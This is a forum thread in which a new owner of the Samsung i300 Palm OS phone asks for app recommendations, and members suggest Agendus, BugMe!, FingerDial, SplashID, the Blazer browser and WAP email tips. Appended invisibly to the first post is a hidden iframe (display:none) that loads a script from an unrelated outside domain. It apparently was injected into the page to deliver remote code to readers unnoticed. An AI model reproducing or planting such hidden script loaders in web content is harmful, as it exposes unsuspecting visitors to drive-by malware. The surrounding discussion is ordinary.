+ Reply to Thread

Thread: killer apps

killer apps

New to the i300. What are the best apps? What can this thing do!?!?!

Thank you

-rob<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Welcome and glad to have you here. Have a look in the Application Compatibility forum from the main page for a list of member recommended apps. A search for "apps" among other variations should offer many choices as well.

My 2 suggestions are ActionNames and Monopoly.

killer apps

Thanks for the reply. Actionnames looks like a winner. Are there any good programs that expand what the phone/pda integration can do? Picture caller id? Does everyone use blazer browser?

I used fast cpu for overclocking on my clie. Has anyone had any problems with it on the i300?

I am on one of sprint's "please stay" plans and have a liberal antime minute allowance. I plan to use the web often. I use the sprint pcs email and aol email. Do yu guys use the old fashioned wireless web to check those types of email? It would seem to be faster.

Also is there any easy way hit "favorite" urls without typing them in everytime.

thanks again

-rob

Blazer allows you to store favorites and also has a substantial cache. Download the latest version for free from the sprint site.

BTW, the new ActionNames is called Agendus and developed by Iambic.

I once used fast cpu and had to run a series of hard resets immediately after. I wouldn't use it with the 300.

I check my sprint mail on the Sprint WAP browser. The WAP browser also has yahoo, aol, etc built into it already. I also used it for hotmail. If I were you I'd set up alerts for my sprint mail box provided you don't receive junk there. It is faster to use WAP but don't forget that you can adjust blazer to be B&W only among other options to increase speed. Further, once yoou have sites stored in the cache it runs a lot quicker as well.

Hope this helps.

Oh for Pic Caller ID run a search for Jake as the topic and look for Jake's Library. There should be roughly 7 hacks there for you to enhance your 300 experience. All of them free.

Enjoy and welcome again!

killer apps

fantastic! I have not received the phone yet, that is why so many dumb questions.

Blazer browser sounds good!

What are you using for overclocking?

I'm not. Others may, but I doubt too many do.

Brings up a good point: Though this device runs on Palm OS a lot of apps and hacks you may be attached to might not function properly on the 300. Just the way it goes as Samsung did not release an SDK. Be careful with what you load onto the 300. Thats not to say you can't have fun and try things out, but don't be shocked if something causes a crash. In that event, as long as you have the latest edition of desktop, which you can download from Palm, you will be up again after your next sync.

killer apps

Sounds good. I used the wireless web heavily on my prior phones (neopoint, tp2200, sanyo 6000) I really would like to get away from the boring interface.

I thought that I wanted to go 3g, but my 2g plan is just too good to pass up. Plus I read the thread on 3g in the OT section. The i300 looks like a great all in one. Not on the cutting edge but a lot of phone for the $200 I payed (nib sealed). I'm looking forward to playing with it.

Thanks again for your help.

-rob

BugMe!

I use BugMe! on a daily basis. I think it is a must for anyone who is as forgetful as myself.

killer apps

I love bugme! Good to hear that works!

-rob

I learned most everything I know about the I-300 from this forum. So I thought I'd return the favor with my first post.

Best programs purchased:
    1. FingerDial ($13) Hands down winner for quickly navigating the address book and dialing phone numbers all with your finger[http://www.fingerclick.com]
    2. SplashID ($15) keep track of logins, IDs, personal information, etc., SplashShopper ($20), [SplashWallet suite ($40) also includes SplashPhoto and Splash Money]
    3.Pocket Quicken ($40) bought this before I got SplashWallet, SplashMoney is similar for less.

Best free programs:
    1. BigClock - alarms, timers, stopwatch, world times
    2. HappyDays - tracks birthdays, creates date book entries
    3. Eudora Mail for palm
    4. any Palm Query App (PQA)/web clipping app. PQAs work with Palm VIIs, but they also work with the I-300. Web access to specific sites formatted for the Palm screen - quicker than using BrowseWEB/Blazer.

PQAs I use:
    ESPN, Mapquest, Weather, WashingtonPost, Visa ATM locator, 555-1212 white/yellow pages [http://www.555-1212.com/wire_step.jsp]

5. AOL 2.0 wireless access (used to be free, but I saw AOL 3.0 wireless listed for $20)

Here are a few old threads that list other apps:
    http://www.sphi300.com/showthread.php?s=&threadid=589
    http://www.sphi300.com/showthread.php?s=&threadid=299

Best of luck with the I-300,

- Aaron

Thanks Aaron.

Your post is exactly why we should keep this place running and expand the topic to cover whatever the members deem appropriate. Brooks has now created all the forums necessary to allow us to talk about anything here.

...and feel free to take advantage of the OT Forum all!

killer apps

Thanks for all of the help. I finally got the i300 in hand today, I am pretty impressed. I still have a lot of learing but I am finding my way around pretty well and have the "mulithack", avantgo, docs to go, bejeweled, and a few others up and running. The most suprising thing to me is that I don't mind carrying it. My prior phone was a sanyo 6000 and that weighs in at 2.29oz. The i300 is slim enough so that the extra weight doesn't even matter. It is fast as well. Benchmark put it in the 250 area, my clie n610c was 207. I am still going to try cruise control later tonght and see if i can squeeze any more speed out of it.

There are a few things that have annoyed me, but over all this is a great device. Unfortunately I was going through a "small" fad when this thing first came out. I should have had this a year ago!

Thanks again.

-rob

Napoleon Bonaparte Jr.

hello

TealDoc 5 is the best for me .

Xiino browser very good .

killer apps

{"TealDoc 5 is the best for me .

Xiino browser very good ."}

Can you tell me about these? I have never heard of either of them. Teldocs semms like a replacement for docstogo, and what is the deal with xiino browser? Are they worth the money? What do they do differently?

Thanks a lot, great forum!

-rob

one more question...

Is there any way to answer an incoming call with the speakerphone?

Thanks again

-rob